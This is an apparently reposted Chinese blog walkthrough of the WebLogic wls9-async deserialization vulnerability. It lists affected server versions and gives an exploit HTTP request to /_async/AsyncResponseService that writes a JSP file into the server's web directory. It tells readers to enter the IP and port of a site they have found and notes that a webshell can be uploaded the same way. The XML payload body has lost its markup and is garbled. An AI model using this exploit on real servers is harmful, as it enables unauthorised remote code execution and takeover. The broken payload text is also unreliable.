WebLogic wls9-async 反序列化漏洞

转载 https://blog.csdn.net/Bul1et/article/details/89514594
前天刚刚爆出了WebLogic wls9-async 反序列化漏洞,大佬们又可以薅羊毛了,这是我的复现过程,仅供参考

影响范围

Oracle WebLogic Server10.3.6.0.0
Oracle WebLogic Server12.1.3.0.0
Oracle WebLogic Server12.2.1.1.0
Oracle WebLogic Server12.2.1.2.0
复现过程(很简单)

EXP请求包如下

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 714

soapenv:Headerwsa:Actionxxwsa:RelatesToxxservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/sh.jspsoapenv:Bodyasy:onAsyncDelivery/

输入你找到网站的ip和端口

这个时候你上传的文件sh.jsp内容为456就会上传到下面的目录里面

http://ip:port/bea_wls_internal/sh.jsp

然后我们访问url

这个只是输出 我们也可以上传shell

作者:Bul1et
来源:CSDN
原文:https://blog.csdn.net/Bul1et/article/details/89514594

你可能感兴趣的:(web渗透,web渗透教程学习笔记)